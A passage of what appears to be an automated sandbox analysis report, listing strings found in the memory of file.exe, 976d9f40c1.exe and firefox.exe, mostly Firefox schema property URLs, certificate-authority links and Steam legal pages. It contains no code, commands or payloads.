Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/ehPreconnectEnabled
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/ehPreloadEnabledthis-is-included-for-desktop-pre-95-support
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/enabled
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/endDate
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/endDatecreateContextWithTimeout/get/
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/enrollmentEndDate
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/enrollmentEndDatehttp://mozilla.org/#/properties/proposedEnrollmentf
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/experimentType
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/experimentTypeplaces.sqlite#1:
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/exposureResults
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/featureIds
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/featureIds/itemshttp://mozilla.org/#/properties/branches
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/featureValidationOptOut
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/featureValidationOptOuthttp://mozilla.org/#/properties/branches/anyO
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/filterFetchResponse
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/forceWaitHttpsRR
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/greasePaddingSize
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/greasePaddingSizegetAPI/register/
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/id
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isBestMatchExperiment
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isBestMatchExperimentbrowser.newtabpage.activity-stream.feeds.snippe
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isEnrollmentPaused
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isRollout
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isRollouthttp://mozilla.org/#/properties/channelwebcompat
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/javascriptValidator
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties/additionalProperties
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0next-generation-accessibility-engine-powering-s
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/1
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/1https://www.google.com/search?client=firefox-b-
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizationsresource://normandy/Normandy.sys.mjsresource://gre/modu
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/mdnFeatureGate
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/mediaExceptionsStrategy
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoClientVariants
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoEnabled
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoEndpointURL
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoProviders
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoTimeoutMs
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/networkPredictor4fb599b7-2bfe-40fa-aec3-5b51dcdef652
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/originsAlternativeEnable
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/originsDaysCutOff
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/priority
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/slug
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomeshttp://mozilla.org/#/properties/outcomes/itemshttp://mozilla
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesAlternativeEnable
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesHalfLifeDays
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesHighWeight
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesLowWeight
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesMediumWeight
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesNumSampledVisits
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pocketFeatureGate
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pocketShowLessFrequentlyCap
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/preconnect
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/preconnect9e34c6e7-cbed-40a0-ba63-35488e171013
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/proposedDurationwebcompat
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/proposedEnrollment
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestAllowPositionInSuggestions
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestAllowPositionInSuggestionshttp://mozilla.org/#/propertie
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestBlockingEnabled
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestBlockingEnabledhttp://mozilla.org/#/properties/pocketFea
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestDataCollectionEnabled
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestEnabled
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsNonSponsoredEnabled
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsNonSponsoredEnabledhttp://mozilla.org/#/pr
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsSponsoredEnabled
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredEnabled
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredEnabledextension/webcompat
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredIndex
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredIndexExtension:RegisterContentScriptsComplet
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestOnboardingDialogVariation
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsDataType
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsEnabled
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScenario
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScenarioextension/webcompat
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScoreMap
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScoreMapExtension:RegisterContentScriptsComplete
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestShouldShowOnboardingDialog
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestShouldShowOnboardingDialogcd09ae95-e2cf-4b8b-8929-791b0d
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestShowOnboardingDialogAfterNRestarts
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredEnabled
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredEnabledhttp://mozilla.org/#/properties/dnsMaxAn
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredIndex
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredIndexExtension:RegisterContentScriptsComplete
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/recordNavigationalSuggestionTelemetry
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/schemaVersion
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/schemaVersionhttp://mozilla.org/#/properties/branches/anyOf/1http://
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showExposureResults
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showExposureResultshttp://mozilla.org/#/properties/ehPreconnectEnabl
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showSearchTermsFeatureGate
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showSearchTermsFeatureGatehttp://mozilla.org/#/properties/pocketShow
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/slug
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/slugwebcompat
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/startDate
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/userFacingDescription
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherFeatureGate
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywords
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywordsMinimumLength
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywordsMinimumLengthCap
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywordsMinimumLengthCapFailed
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywordsMinimumLengthhttp://mozilla.org/#/properties/pagesAlt
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywordshttp://mozilla.org/#/properties/merinoEnabledawesome-
Source: firefox.exe, 00000019.00000002.3238885553.00000137A11B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3207818517.000001379EC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3063328605.00000137A0261000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3234717923.00000137A0EBA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3024124935.00000137A61C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3205739968.000001379E937000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3234717923.00000137A0E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3232782282.00000137A0B4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3234139332.00000137A0D49000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2991725826.000001379EAA0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3016486449.00000137A61E7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3234139332.00000137A0D61000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2996383263.000001379E799000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3197648410.000001379E110000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3217558620.000001379FF55000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3234139332.00000137A0DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DDDC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3207362335.000001379EB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3098570629.00000137A0261000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3016038531.00000137A61CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: file.exe, 00000000.00000003.2133456713.00000000059C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3212088347.000001379F37D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.2133456713.00000000059C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3212088347.000001379F37D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094889804.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803112102.00000000016E5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803355226.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2922291793.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094889804.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803112102.00000000016E5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803355226.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2922291793.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094889804.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803112102.00000000016E5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803355226.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2922291793.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-update
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-updateWRITE_ERROR_BACKGROUND_TASK_SHARING_VIOLATIONPREF_APP_UPDATE_N
Source: firefox.exe, 00000019.00000003.3042142372.00000137A69BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3034748232.00000137A69BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A69B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2006/browser/search/
Source: firefox.exe, 00000019.00000002.3207818517.000001379EC43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A946000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3178406027.0000013799F45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3234717923.00000137A0E84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0C4E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3207362335.000001379EB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A925000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD4B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3215983830.000001379FD58000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD2A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3197648410.000001379E1F1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3215694753.000001379FCAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3215694753.000001379FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3234139332.00000137A0DCF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulExpected
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: file.exe, 00000000.00000003.2133456713.00000000059C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3040743134.00000137A91A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3212088347.000001379F37D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3033463599.00000137A91A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3240318696.00000137A1B23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
